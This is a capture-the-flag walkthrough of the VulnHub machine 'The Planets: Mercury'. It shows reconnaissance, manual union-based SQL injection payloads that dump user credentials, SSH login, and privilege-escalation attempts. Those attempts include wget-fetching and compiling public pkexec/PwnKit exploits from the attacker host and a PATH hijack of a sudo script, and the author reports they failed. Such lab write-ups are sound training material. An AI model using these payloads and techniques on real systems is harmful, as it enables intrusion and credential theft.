The Planets: Mercury
Author: jason_huawen
Basic information of the target machine
Title: The Planets: Mercury
address:
https://www.vulnhub.com/entry/the-planets-mercury,544/
Identify the target host IP address
──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo netdiscover -i eth1Currently scanning: 192.168.76.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9e:f5:5c 1 60 PCS Systemtechnik GmbH
192.168.56.226 08:00:27:ff:54:84 1 60 PCS Systemtechnik GmbH
Use the netdiscover tool that comes with Kali Linux to identify the IP address of the target host as 192.168.56.226
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.226 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 23:03 EST
Nmap scan report for localhost (192.168.56.226)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
| 256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_ 256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Sun, 27 Nov 2022 04:03:14 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html
| X-Frame-Options: DENY
| Content-Length: 2366
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sun, 27 Nov 2022 04:03:14 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 69
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Hello. This site is currently in development please check back later.
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=11/26%Time=6382E184%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2027\x20Nov\x20
SF:2022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.
SF:2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x
SF:20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r
SF:\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\
SF:x20currently\x20in\x20development\x20please\x20check\x20back\x20later\.
SF:")%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2027\x20
SF:Nov\x202022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython
SF:/3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opt
SF:ions:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site
SF:\x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20
SF:later\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//D
SF:TD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www
SF:\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20con
SF:tent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<tit
SF:le>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20
SF:<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP
SF:/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20exp
SF:lanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x
SF:20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n
SF:")%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x
SF:20Sun,\x2027\x20Nov\x202022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer
SF:/0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Optio
SF:ns:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<ht
SF:ml\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\
SF:"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20n
SF:ot\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x2
SF:0<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<styl
SF:e\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\
SF:x20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x202
SF:0px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x
SF:20\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee
SF:;\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1
SF:px\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:norma
SF:l;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20fon
SF:t-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x2
SF:0table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:1
SF:00%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
MAC Address: 08:00:27:FF:54:84 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.61 seconds
NMAP scan results show that the target host has 2 open ports: 22 (SSH), 8080 (HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Mercury] └─$ curl http://192.168.56.226:8080/ Hello. This site is currently in development please check back later. ┌──(kali㉿kali)-[~/Vulnhub/Mercury] └─$ curl http://192.168.56.226:8080/robots.txt User-agent: * Disallow: /
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ nikto -h http://192.168.56.226:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.226
+ Target Hostname: 192.168.56.226
+ Target Port: 8080
+ Start Time: 2022-11-26 23:17:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-17113: /SilverStream: SilverStream allows directory listing
+ Server banner has changed from 'WSGIServer/0.2 CPython/3.8.2' to 'WSGIServer/0.2 Python/3.8.2' which may suggest a WAF, load balancer or proxy is in place
+ 7928 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2022-11-26 23:17:52 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (WSGIServer/0.2) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
The Nikto tool recognizes the /SilverStream directory:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/SilverStream/
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /SilverStream/</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; color:#000; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://192.168.56.226:8080/SilverStream/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>mercury_proj.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
[name='index']
</li>
<li>
robots.txt
[name='robots']
</li>
<li>
mercuryfacts/
</li>
</ol>
<p>
The current path, <code>SilverStream/</code>, didn't match any of these.
</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Although the 404 page is returned, some debug information is returned, and we can know that there is a directory: mercuryfacts
Access this directory:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/
<html>
<head>
<title> Mercury Facts </title>
</head>
<body>
<img src="/static/mercury_facts/mercury_1.jpg" alt="Picture of Mercury" width="400" height="400">
<br />
Still in development.
<ul>
<li> Mercury Facts: <a href='/mercuryfacts/1'> Load a fact. </a> </li>
<li> Website Todo List: <a href='/mercuryfacts/todo'> See list. </a> </li>
</ul>
</body>
</html>
──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/todo
<html>
<head>
<title> Mercury Facts Todo </title>
</head>
<body>
Still todo:
<ul>
<li> Add CSS. </li>
<li> Implement authentication (using users table)</li>
<li> Use models in django instead of direct mysql call</li>
<li> All the other stuff, so much!!! </li>
</ul>
</body>
</html>
From the tips given by the author here, the current interaction with the database is directly with mysql, not through django, so there may be SQL injection vulnerabilities.
Among them, /mercuryfacts/1, if you input different numbers, different information will be returned, and will there be SQL injection vulnerabilities?
http://192.168.56.226:8080/mercuryfacts/1 order by 1/
Fact id: 1 order by 1. (('Mercury does not have any moons or rings.',),)
only 1 column
http://192.168.56.226:8080/mercuryfacts/1 and 1%3D2 union select database()/
Fact id: 1 and 1=2 union select database(). (('mercury',),)
The database name is Mercury
Fact id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 0,1. (('facts',),)
The name of the first table is facts
act id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 1,1. (('users',),)
The name of the second table is users
Next, get the field names of the users table
Fact id: 1 and 1=2 union select column_name from
information_schema.columns where table_schema=database() and
table_name='users' limit 0,1. (('id',),)
The first field is id
Fact id: 1 and 1=2 union select column_name from
information_schema.columns where table_schema=database() and
table_name='users' limit 1,1. (('password',),)
The second field is password
Fact id: 1 and 1=2 union select column_name from
information_schema.columns where table_schema=database() and
table_name='users' limit 2,1. (('username',),)
The third field is username
Next, dump the data in the table:
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 0,1. (('john~johnny1987',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 1,1. (('laura~lovemykids111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 2,1. (('sam~lovemybeer111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from
users limit 3,1. (('webmaster~mercuryisthesizeof0.056Earths',),)
So far, using the SQL manual injection method, all usernames and passwords have been obtained:
┌──(kali㉿kali)-[~/Vulnhub/Mercury] └─$ cat username_and_password webmaster mercuryisthesizeof0.056Earths sam lovemybeer111 laura lovemykids111 john johnny1987
So these user names and passwords have not seen the user login page of port 8080 so far. Could it be the SSH service? Try:
Tried all user names and corresponding passwords, and found that only the webmaster user can log in successfully:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ls
nmap_full_scan username_and_password
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ cat username_and_password
webmaster mercuryisthesizeof0.056Earths
sam lovemybeer111
laura lovemykids111
john johnny1987
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh john@192.168.56.226
The authenticity of host '192.168.56.226 (192.168.56.226)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.226' (ED25519) to the list of known hosts.
john@192.168.56.226's password:
Permission denied, please try again.
john@192.168.56.226's password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh laura@192.168.56.226
laura@192.168.56.226's password:
Permission denied, please try again.
laura@192.168.56.226's password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh sam@192.168.56.226
sam@192.168.56.226's password:
Permission denied, please try again.
sam@192.168.56.226's password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh webmaster@192.168.56.226
webmaster@192.168.56.226's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$
webmaster@mercury:~$ cat user_flag.txt [user_flag_8339915c9a454657bd60ee58776f4ccd] webmaster@mercury:~$ cd mercury_proj/ webmaster@mercury:~/mercury_proj$ ls -alh total 28K drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 . drwx------ 4 webmaster webmaster 4.0K Sep 2 2020 .. -rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3 -rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 mercury_facts drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28 2020 mercury_index drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 mercury_proj -rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt webmaster@mercury:~/mercury_proj$ cat notes.txt Project accounts (both restricted): webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== webmaster@mercury:~/mercury_proj$ cd mercury_facts/ webmaster@mercury:~/mercury_proj/mercury_facts$ ls -alh total 48K drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 . drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 .. -rw-r--r-- 1 webmaster webmaster 63 Aug 27 2020 admin.py -rw-r--r-- 1 webmaster webmaster 100 Aug 27 2020 apps.py -rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 __init__.py drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 migrations -rw-r--r-- 1 webmaster webmaster 57 Aug 27 2020 models.py drwxrwxr-x 2 webmaster webmaster 4.0K Aug 28 2020 __pycache__ drwxrwxr-x 3 webmaster webmaster 4.0K Sep 1 2020 static drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 templates -rw-r--r-- 1 webmaster webmaster 60 Aug 27 2020 tests.py -rw-rw-r-- 1 webmaster webmaster 369 Aug 28 2020 urls.py -rw-r--r-- 1 webmaster webmaster 637 Aug 28 2020 views.py webmaster@mercury:~/mercury_proj/mercury_facts$ cd .. webmaster@mercury:~/mercury_proj$ ls -alh total 28K drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 . drwx------ 4 webmaster webmaster 4.0K Sep 2 2020 .. -rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3 -rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 mercury_facts drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28 2020 mercury_index drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 mercury_proj -rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt webmaster@mercury:~/mercury_proj$
There is a base64-encoded password in the notes.txt file, just decode it, and then switch to the linuxmaster user
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" |base64 -d
mercurymeandiameteris4880km
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$
linuxmaster@mercury:/home$ sudo -l
Matching Defaults entries for linuxmaster on mercury:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User linuxmaster may run the following commands on mercury:
(root : root) SETENV: /usr/bin/check_syslog.sh
Escalation of rights
linuxmaster@mercury:/home$ find / -perm -4000 -type f 2>/dev/null /usr/bin/sudo /usr/bin/gpasswd /usr/bin/su /usr/bin/chsh /usr/bin/newgrp /usr/bin/mount /usr/bin/chfn /usr/bin/at /usr/bin/pkexec /usr/bin/umount /usr/bin/fusermount /usr/bin/passwd /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1
Use the last command to escalate privileges
https://www.exploit-db.com/exploits/17932
linuxmaster@mercury:/tmp$ wget http://192.168.56.206:8000/17932.c --2022-11-27 05:23:26-- http://192.168.56.206:8000/17932.c Connecting to 192.168.56.206:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 3492 (3.4K) [text/x-csrc] Saving to: '17932.c' 17932.c 100%[====================================================>] 3.41K --.-KB/s in 0s 2022-11-27 05:23:26 (715 MB/s) - '17932.c' saved [3492/3492] linuxmaster@mercury:/tmp$ ls 17932.c linpeas.sh systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi tmux-1002 linuxmaster@mercury:/tmp$ gcc 17932.c -o exploit linuxmaster@mercury:/tmp$ ls 17932.c systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg tmux-1002 exploit systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg linpeas.sh systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi linuxmaster@mercury:/tmp$ chmod +x exploit linuxmaster@mercury:/tmp$ ./exploit ============================= = PolicyKit Pwnage = = by zx2c4 = = Sept 2, 2011 = ============================= [+] Configuring inotify for proper pid. [+] Launching pkexec. linuxmaster@mercury:/tmp$
Escalation of privileges failed, it seems that there is something wrong with this exploit code.
Change the exploit code:
──(kali㉿kali)-[~/Vulnhub/Mercury] └─$ ls 17932.c CVE-2021-4034-main cve.tar.gz nmap_full_scan cve-2021-4034.c CVE-2021-4034-main.zip linpeas.sh username_and_password
Since the target host does not have the zip command, it is packaged and uploaded to the target host with tar
linuxmaster@mercury:/tmp$ ls 17932.c cve.tar.gz systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg cve-2021-4034.c exploit systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg CVE-2021-4034-main exploit2 systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi CVE-2021-4034-main.zip linpeas.sh tmux-1002 linuxmaster@mercury:/tmp$ cd CVE-2021-4034-main/ linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls cve-2021-4034.sh dry-run LICENSE Makefile pwnkit.c README.md linuxmaster@mercury:/tmp/CVE-2021-4034-main$ make cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cat cve-2021-4034.sh >cve-2021-4034 chmod a+x cve-2021-4034 echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules mkdir -p GCONV_PATH=. cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:. linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls cve-2021-4034 dry-run 'GCONV_PATH=.' Makefile pwnkit.so cve-2021-4034.sh gconv-modules LICENSE pwnkit.c README.md linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ./cve-2021-4034 make: *** No targets. Stop.
Execute the program, but without success. So this path is problematic, and the command given by sudo -l is the direction to try to get the right to escalate:
linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh #!/bin/bash tail -n 10 /var/log/syslog
Note that the tail command here is not an absolute path, so start with the tail command. Unfortunately, this check_syslog.sh only has readable permissions, and you need to use another method to elevate the permissions:
vice-CmPcsi lrwxrwxrwx 1 linuxmaster linuxmaster 12 Nov 27 05:47 tail -> /usr/bin/vim drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .Test-unix drwx------ 2 linuxmaster linuxmaster 4.0K Nov 27 05:16 tmux-1002 drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .X11-unix drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .XIM-unix linuxmaster@mercury:/tmp$ ln -s /usr/bin/vim tail linuxmaster@mercury:/tmp$ export PATH=$(pwd):$PATH linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh Nov 27 05:30:11 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection. Nov 27 05:34:27 mercury kernel: [ 5651.595118] cgroup: fork rejected by pids controller in /user.slice/user-1001.slice/session-2.scope Nov 27 05:35:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server. Nov 27 05:35:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection. Nov 27 05:40:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server. Nov 27 05:40:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection. Nov 27 05:45:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server. Nov 27 05:45:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection. Nov 27 05:50:08 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server. Nov 27 05:50:08 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection. linuxmaster@mercury:/tmp$
But failed to elevate rights